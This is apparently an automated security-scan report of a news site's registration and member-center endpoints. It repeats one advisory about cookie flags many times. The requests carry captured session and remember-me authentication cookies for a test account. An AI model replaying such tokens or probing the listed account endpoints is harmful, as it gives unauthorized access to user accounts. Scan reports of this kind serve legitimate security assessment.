GET /cas HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; SUBSCRIBERINFO3=unkz; JSESSIONID=698F629D8D09311DADAE187E0DFFC18F; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; Axxd=1; s_sq=%5B%5BB%5D%5D; AxData=; pers_cookie_insert_cnbc.com_Prod_registration_servers_80=1640092224.20480.0000; s_cc=true; TZM=-360; s_nr=1292954620754; pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
Response
HTTP/1.1 404 Not Found Date: Tue, 21 Dec 2010 20:32:53 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Content-Length: 201 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; expires=Tue, 21-Dec-2010 23:32:54 GMT; path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /cas was not found on this server.</p> </body></html> ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checkemail.do HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; SUBSCRIBERINFO3=unkz; JSESSIONID=698F629D8D09311DADAE187E0DFFC18F; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; Axxd=1; s_sq=%5B%5BB%5D%5D; AxData=; pers_cookie_insert_cnbc.com_Prod_registration_servers_80=1640092224.20480.0000; s_cc=true; TZM=-360; s_nr=1292954620754; pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
<response> <status>FAILURE</status> <description>Email Address is required</description> <timestamp>Tue Dec 21 15:33:44 EST 2010</timestamp ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checkpassword.do HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; SUBSCRIBERINFO3=unkz; JSESSIONID=698F629D8D09311DADAE187E0DFFC18F; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; Axxd=1; s_sq=%5B%5BB%5D%5D; AxData=; pers_cookie_insert_cnbc.com_Prod_registration_servers_80=1640092224.20480.0000; s_cc=true; TZM=-360; s_nr=1292954620754; pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checkscreenname.do HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; SUBSCRIBERINFO3=unkz; JSESSIONID=698F629D8D09311DADAE187E0DFFC18F; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; Axxd=1; s_sq=%5B%5BB%5D%5D; AxData=; pers_cookie_insert_cnbc.com_Prod_registration_servers_80=1640092224.20480.0000; s_cc=true; TZM=-360; s_nr=1292954620754; pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checkzipcode.do HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; SUBSCRIBERINFO3=unkz; JSESSIONID=698F629D8D09311DADAE187E0DFFC18F; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; Axxd=1; s_sq=%5B%5BB%5D%5D; AxData=; pers_cookie_insert_cnbc.com_Prod_registration_servers_80=1640092224.20480.0000; s_cc=true; TZM=-360; s_nr=1292954620754; pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /createUser.do HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; SUBSCRIBERINFO3=unkz; JSESSIONID=698F629D8D09311DADAE187E0DFFC18F; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; Axxd=1; s_sq=%5B%5BB%5D%5D; AxData=; pers_cookie_insert_cnbc.com_Prod_registration_servers_80=1640092224.20480.0000; s_cc=true; TZM=-360; s_nr=1292954620754; pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
/* Confirmation overlay whcih popsup once the user submits*/ .confMainDiv{margin:0px;padding:0px;position:absolute;z-index:200;display:none;} .confMainDiv .confirmationDiv{font-family:Arial;font-size: ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 404 Not Found Date: Wed, 22 Dec 2010 14:59:28 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Content-Length: 242 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1153552960.23040.0000; expires=Wed, 22-Dec-2010 17:59:28 GMT; path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /email/images/customer_care_response_F-03.jpg was not ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 404 Not Found Date: Wed, 22 Dec 2010 14:59:28 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Content-Length: 242 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1153552960.23040.0000; expires=Wed, 22-Dec-2010 17:59:28 GMT; path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /email/images/customer_care_response_F-07.jpg was not ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 404 Not Found Date: Tue, 21 Dec 2010 17:40:57 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Content-Length: 209 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; expires=Tue, 21-Dec-2010 20:40:57 GMT; path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /favicon.ico was not found on this server.</p> </body ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
/* Prototype JavaScript framework, version 1.5.0 * (c) 2005-2007 Sam Stephenson * * Prototype is freely distributable under the terms of an MIT-style license. * For details, see the Prototype ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
//Field Validations - start var goOptions = true; var goAddrs1 = true; var goAddrs2 = true; var goPhone = true; var goHhi = true; var goIndustry = true; var goStDsc = true; var goCity = true; ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
function toggleMessage(show, hide1, hide2){ var showObj = document.getElementById(show); var hideObj1 = document.getElementById(hide1); var hideObj2 = document.getElementById(hide2); hideObj1. ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
//Field Validations - start var goEmail = true; var goEmailConf = true; var goPwd = true; var goPwdConf = true; var goSecQstn = true; var goSecAns = true; var goScrnNm = true; var goFrstNm = true; var ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
/* SiteCatalyst code version: H.2. Copyright 1997-2008 Omniture, Inc. More info available at http://www.omniture.com */ /* Specify the Report Suite ID(s) to track here FEBRUARY 19 2008 UPDATE NBCU CMJ ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <title>Member Center</title> <link href="/css/member_center_sytles.css" rel="stylesheet" type ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /membercenter/changeemailform.do HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; SUBSCRIBERINFO3=unkz; JSESSIONID=698F629D8D09311DADAE187E0DFFC18F; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; Axxd=1; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CMain%252520Menu%2526pidt%253D1%2526oid%253Dhttps%25253A//register.cnbc.com/email/EmailSupport.jsp%2526ot%253DA; AxData=; pers_cookie_insert_cnbc.com_Prod_registration_servers_80=1640092224.20480.0000; s_cc=true; TZM=-360; s_nr=1292954620754; pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <title>Reset Password</title> <link href="/css/member_center_sytles.css" rel="stylesheet" typ ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /membercenter/notificationmanager.do HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; SUBSCRIBERINFO3=unkz; JSESSIONID=698F629D8D09311DADAE187E0DFFC18F; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; Axxd=1; s_sq=%5B%5BB%5D%5D; AxData=; pers_cookie_insert_cnbc.com_Prod_registration_servers_80=1640092224.20480.0000; s_cc=true; TZM=-360; s_nr=1292954620754; pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <title>CNBC Member Center: Free CNBC Newsletters</title> <link href="/css/member_center_sytle ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /membercenter/plusmanager.do HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; SUBSCRIBERINFO3=unkz; JSESSIONID=698F629D8D09311DADAE187E0DFFC18F; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; Axxd=1; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CMain%252520Menu%2526pidt%253D1%2526oid%253Dhttps%25253A//register.cnbc.com/email/EmailSupport.jsp%2526ot%253DA; AxData=; pers_cookie_insert_cnbc.com_Prod_registration_servers_80=1640092224.20480.0000; s_cc=true; TZM=-360; s_nr=1292954620754; pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html lang="en"> <head> <title>CNBC Member Center: Account Information</title> <link href="/css/me ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /membercenter/promanager.do HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; SUBSCRIBERINFO3=unkz; JSESSIONID=698F629D8D09311DADAE187E0DFFC18F; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; Axxd=1; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CMain%252520Menu%2526pidt%253D1%2526oid%253Dhttps%25253A//register.cnbc.com/email/EmailSupport.jsp%2526ot%253DA; AxData=; pers_cookie_insert_cnbc.com_Prod_registration_servers_80=1640092224.20480.0000; s_cc=true; TZM=-360; s_nr=1292954620754; pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <title>CNBC Pro subscription manager</title> <link href="/css/member_center_sytles.css" rel=" ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /membercenter/updatePassword.do HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; SUBSCRIBERINFO3=unkz; JSESSIONID=698F629D8D09311DADAE187E0DFFC18F; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; Axxd=1; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CMain%252520Menu%2526pidt%253D1%2526oid%253Dhttps%25253A//register.cnbc.com/email/EmailSupport.jsp%2526ot%253DA; AxData=; pers_cookie_insert_cnbc.com_Prod_registration_servers_80=1640092224.20480.0000; s_cc=true; TZM=-360; s_nr=1292954620754; pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <title>Update Password</title> <link href="/css/member_center_sytles.css" rel="stylesheet" ty ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /membercenter/updateUser.do HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; SUBSCRIBERINFO3=unkz; JSESSIONID=698F629D8D09311DADAE187E0DFFC18F; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; Axxd=1; s_sq=%5B%5BB%5D%5D; AxData=; pers_cookie_insert_cnbc.com_Prod_registration_servers_80=1640092224.20480.0000; s_cc=true; TZM=-360; s_nr=1292954620754; pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html lang="en"> <head> <title>CNBC Member Center: Account Information</title> <link href="/css/me ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /membercenter/viewalert.do HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; SUBSCRIBERINFO3=unkz; JSESSIONID=698F629D8D09311DADAE187E0DFFC18F; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; Axxd=1; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CMain%252520Menu%2526pidt%253D1%2526oid%253Dhttps%25253A//register.cnbc.com/email/EmailSupport.jsp%2526ot%253DA; AxData=; pers_cookie_insert_cnbc.com_Prod_registration_servers_80=1640092224.20480.0000; s_cc=true; TZM=-360; s_nr=1292954620754; pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <title>CNBC Member Center: Breaking News Alerts</title> <link href="/css/member_center_sytles ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
